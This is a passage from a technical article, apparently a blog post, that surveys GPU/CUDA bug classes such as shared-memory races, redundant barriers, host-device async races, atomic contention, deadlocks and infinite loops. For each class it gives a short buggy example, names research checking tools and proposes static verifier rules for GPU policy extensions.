&lt;strong&gt;Option C – per-thread/per-warp sharding&lt;/strong&gt; (each lane updates its own slot).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Shared-memory races depend only on the policy's access patterns and synchronization, providing strong soundness via structural restrictions (per-lane sharding or lane0-only writes eliminate races by construction) with medium completeness (complex shared-memory algorithms rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Three options, all Extension-local: (A) Ban shared-memory writes entirely; (B) Require per-lane sharding: each lane writes its own slot, no conflicts possible; (C) Require lane0-only writes with atomic helpers. All three approaches make races impossible by construction without requiring complex GPUVerify-style interleaving proofs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUVerify explicitly targets data-race freedom as a core verification goal and defines intra-group/inter-group races; ESBMC-GPU checks data races via bounded model checking; Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is a runtime shared-memory hazard detector; Simulee detects data race bugs using CUDA-aware race definitions; Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: GPUVerify-style proofs are possible but complex for arbitrary code; structural restrictions are simpler and equally sound for policy use cases. Policies needing complex shared-memory algorithms should use ringbuffers instead, avoiding shared memory entirely.&lt;/p&gt;




&lt;h3&gt;
  
  
  12) Redundant Barriers (unnecessary &lt;code&gt;__syncthreads&lt;/code&gt;) [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A redundant barrier is a performance-pathology class: removing the barrier &lt;strong&gt;does not introduce a race&lt;/strong&gt;, so the barrier was unnecessary overhead.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="c1"&gt;// no cross-thread dependence here&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;      &lt;span class="c1"&gt;// redundant&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Wu et al.: defines "redundant barrier function."(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee: detects redundant barrier bugs and reports numbers across projects.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;AuCS: repairs synchronization bugs, including redundant barriers.(&lt;a href="https://www.shinhwei.com/cuda-repair.pdf" rel="noopener noreferrer"&gt;Shinhwei&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GPURepair tooling also exists to insert/remove barriers to fix races and remove unnecessary ones.(&lt;a href="https://github.com/cs17resch01003/gpurepair" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static/dynamic dependence analysis:&lt;/strong&gt; determine whether any read-after-write / write-after-read across threads is protected by the barrier; if not, barrier is removable (Simulee/AuCS angle).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Since barriers are allowed in policy code (with uniform placement enforced by #1), redundant barriers become a performance concern. Use static dependence analysis to detect barriers where no cross-thread data dependence exists between the preceding writes and subsequent reads. The verifier can warn about or reject redundant barriers to enforce &lt;strong&gt;bounded overhead&lt;/strong&gt; as a correctness property, ensuring policies do not introduce unnecessary synchronization cost.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-heuristic. Static dependence analysis can identify barriers that protect no cross-thread memory dependence, flagging them as redundant. This provides good detection coverage for common patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier performs dependence analysis on barrier sites: if no read-after-write or write-after-read across threads is protected by a barrier, the barrier is flagged as redundant and rejected. Combined with the policy overhead budget, this ensures barriers are only used when structurally necessary for shared-memory coordination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Simulee detects redundant barriers through evolutionary simulation; Wu et al. define "redundant barrier function" as a key synchronization bug type; GPURepair uses GPUVerify as an oracle to repair data races/barrier divergence and can remove unnecessary barriers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some barriers may appear redundant in isolation but are necessary for correctness under specific scheduling scenarios. Conservative analysis may retain some unnecessary barriers; profiling tools can identify remaining optimization opportunities at the kernel level.&lt;/p&gt;




&lt;h3&gt;
  
  
  13) Host-Device Asynchronous Data Races (API ordering bugs) [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;CUDA exposes async kernel launches/memcpy/events; host code can race with device work if synchronization is missing. This is a major real-world bug source in heterogeneous programs and is &lt;em&gt;not&lt;/em&gt; covered by pure kernel-only verifiers.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;cudaMalloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="n"&gt;kernel&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;grid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;// missing cudaDeviceSynchronize() here&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;h_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="n"&gt;cudaMemcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;h_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;cudaMemcpyDeviceToHost&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// race with kernel&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;CuSan is an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer.(&lt;a href="https://github.com/tudasc/cusan" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic detection (CuSan-style):&lt;/strong&gt; instrument host-side CUDA API calls and detect ordering violations at runtime.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies interact with host-visible buffers or involve asynchronous map copies, define a strict &lt;strong&gt;lifetime &amp;amp; ordering contract&lt;/strong&gt; (e.g., "policy writes are only consumed after a guaranteed sync point"). For testing, integrate CuSan into CI for host-side integration tests of the runtime/loader.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Host+Device/System (H), Dynamic-only. These races involve host-side API calls (cudaMemcpy, kernel launch, synchronization) interacting with device execution: the policy verifier provides no soundness guarantees for this bug class (host API ordering is out of scope); completeness is N/A as this is fundamentally a host-side problem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The policy verifier cannot provide guarantees for this bug class. It can only ensure policy code doesn't introduce &lt;em&gt;additional&lt;/em&gt; async semantics (e.g., policy writes are only visible after guaranteed sync points). Define strict lifetime &amp;amp; ordering contracts for policy-accessible buffers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: CuSan is the primary tool: an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer. Integrate CuSan into CI for host-side integration tests of the runtime/loader.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Dynamic detection depends on test coverage: executed paths only. For production, implement runtime checks in the loader/driver for obvious violations (e.g., policy accessing freed memory, missing sync before host read). This is the H-track core tool requirement.&lt;/p&gt;




&lt;h3&gt;
  
  
  14) Atomic Contention [Performance, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Heavy atomic contention is a classic "performance bug that behaves like a DoS" under massive parallelism. Even when correctness is preserved, contention on a single address can cause extreme slowdowns (orders of magnitude). With millions of threads, a single hot atomic can serialize execution and cause tail latency explosion.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;// All threads atomically increment the same location =&amp;gt; extreme contention&lt;/span&gt;
  &lt;span class="n"&gt;atomicAdd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Called with &amp;lt;&amp;lt;&amp;lt;1000, 1024&amp;gt;&amp;gt;&amp;gt; =&amp;gt; 1M threads contending on one address&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUAtomicContention: an open-source benchmark suite (2025) explicitly measuring atomic performance under contention and across different &lt;strong&gt;memory scopes&lt;/strong&gt; (block/device/system) and access patterns.(&lt;a href="https://github.com/KIT-OSGroup/GPUAtomicContention" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Budget-based verification:&lt;/strong&gt; limit atomic frequency per warp/block.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Benchmarking:&lt;/strong&gt; use atomic contention benchmarks to calibrate safe budgets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis:&lt;/strong&gt; identify hot atomic targets and warn about contention risk.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Treat "atomic frequency + contention risk" as a verifier-enforced budget: e.g., allow at most one global atomic per warp, or require warp-aggregated updates. For evaluation, you can reuse the open benchmark suite to calibrate "safe budgets" per GPU generation. Consider requiring warp-level reduction before global atomics to reduce contention by 32x.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via budgetization, Static-sound. Contention severity depends on both policy behavior (atomic frequency) and kernel behavior (concurrent atomics to same address), but this reduces to Extension-local by treating atomics as a budget, providing strong soundness for policy's contribution with medium completeness (high-throughput atomic patterns hit budget limits).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier treats "atomic frequency + contention risk" as a budget: (1) limit to N global atomics per warp per invocation; (2) require warp-aggregation (one atomic per warp instead of per-lane) for 32x contention reduction by construction; (3) forbid unbounded atomic loops. The budget provides bounded-overhead guarantees for policy's contribution regardless of kernel behavior.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUAtomicContention is an open-source benchmark suite (2025) explicitly measuring atomic performance under contention across different memory scopes (block/device/system) and access patterns: use it to calibrate "safe budgets" per GPU generation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Total system contention depends on concurrent workloads: the verifier bounds &lt;em&gt;policy's contribution&lt;/em&gt;, not system-wide slowdown. "Making Powerful Enemies on NVIDIA GPUs" demonstrates adversarial kernels can systematically amplify interference through shared resource contention, making tight system-wide bounds impossible to guarantee statically.&lt;/p&gt;




&lt;h3&gt;
  
  
  15) Non-Barrier Deadlocks [Safety, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Besides barrier divergence (which is specifically about &lt;code&gt;__syncthreads&lt;/code&gt; under divergent control flow), SIMT lockstep can create deadlocks in other patterns that are unusual on CPUs: spin-waiting, lock contention within a warp, and named-barrier misuse. Warp-specialized kernels often use &lt;strong&gt;named barriers&lt;/strong&gt; or structured synchronization patterns between warps/roles (producer/consumer). Bugs include: (a) spin deadlock due to missing signals, (b) unsafe barrier reuse ("recycling") across iterations, (c) races between producers/consumers.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (spin deadlock)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;// Block 0 expects Block 1 to set flag, but no global sync exists&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;atomicAdd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;// may spin forever&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* forgot to set flag */&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Bug example (named-barrier misuse, sketch)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Producer writes buffer then signals barrier B&lt;/span&gt;
&lt;span class="c1"&gt;// Consumer waits on B then reads buffer&lt;/span&gt;
&lt;span class="c1"&gt;// Bug: consumer waits on wrong barrier instance / reused incorrectly in loop&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports finding deadlocks via symbolic exploration of GPU kernels.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;ESBMC-GPU models and checks deadlock too.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;WEFT verifies &lt;strong&gt;deadlock freedom&lt;/strong&gt;, &lt;strong&gt;safe barrier recycling&lt;/strong&gt;, and &lt;strong&gt;race freedom&lt;/strong&gt; for producer-consumer synchronization (named barriers).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Protocol verification (WEFT-style):&lt;/strong&gt; for specific synchronization patterns, prove deadlock freedom + race freedom + safe reuse. Model barrier instances across loop iterations and prove safe reuse.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Symbolic exploration (GKLEE-style):&lt;/strong&gt; explore possible interleavings and detect deadlock states.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Ban blocking primitives in policy code (locks, spin loops, waiting on global conditions). Add a verifier rule: &lt;strong&gt;no unbounded loops / no "wait until" patterns&lt;/strong&gt;. If you absolutely need synchronization, force "single-lane, nonblocking" patterns and bounded retries. Policies must not interact with named barriers (no waits, no signals). This aligns with the availability story: policies must not create device stalls.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Deadlock patterns (spin-wait, lock contention, named-barrier misuse) are structural properties of policy code; banning blocking primitives makes deadlocks structurally impossible with perfect soundness and high completeness (blocking patterns are rarely needed in policy code).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier bans: (1) &lt;code&gt;while(condition)&lt;/code&gt; loops that could spin indefinitely; (2) lock primitives and mutex-like patterns; (3) named-barrier operations (waits, signals); (4) waiting on global conditions; (5) any construct that could block warp/block execution. If synchronization is needed, force "single-lane, nonblocking" patterns with bounded retries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU models and checks deadlock via bounded model checking; WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization with named barriers; GKLEE reports finding deadlocks via symbolic exploration. iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with legitimate bounded-retry patterns must be structured with explicit iteration counts to prove termination. iGUARD notes that ITS breaks warp-lockstep assumptions: threads in the same warp can now deadlock on locks if they take different branches. Banning blocking primitives is the only sound approach without complex ITS-aware analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  16) Kernel Non-Termination / Infinite Loops [Safety, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Infinite loops can hang GPU execution. In practice, non-termination is especially dangerous because GPU preemption/recovery can be coarse.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;// infinite loop if flag never set&lt;/span&gt;
  &lt;span class="c1"&gt;// or: while (true) { /* missing break */ }&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect/handle.(&lt;a href="https://cai.type.sk/content/2019/1/cl-vis-visualization-platform-for-understanding-and-checking-the-opencl-programs/4318.pdf" rel="noopener noreferrer"&gt;Computing and Informatics&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static bounds analysis:&lt;/strong&gt; prove loop termination or enforce compile-time bounded loops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime watchdog:&lt;/strong&gt; timeout-based detection (coarse but practical).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;This is where "bounded overhead = correctness" is easiest to justify: enforce a &lt;strong&gt;strict instruction/iteration bound&lt;/strong&gt; for policy code (like eBPF on CPU). If policies may contain loops, require compile-time bounded loops only, with conservative upper bounds.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy; kernel non-termination is out of scope. Static-sound, where bounded loops or instruction budget guarantees policy termination with strong soundness but low completeness (data-dependent loop bounds rejected even if always terminating).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The eBPF approach works: (1) all loops must have compile-time bounded iteration counts; OR (2) ban loops entirely; OR (3) enforce a total instruction budget. The verifier proves termination by construction without analyzing the kernel. Policies may contain loops only if bounds can be statically determined.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU can find non-termination paths within context bounds; CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect; runtime watchdogs provide coarse timeout-based detection (engineering stopgap, not completeness).&lt;/p&gt;

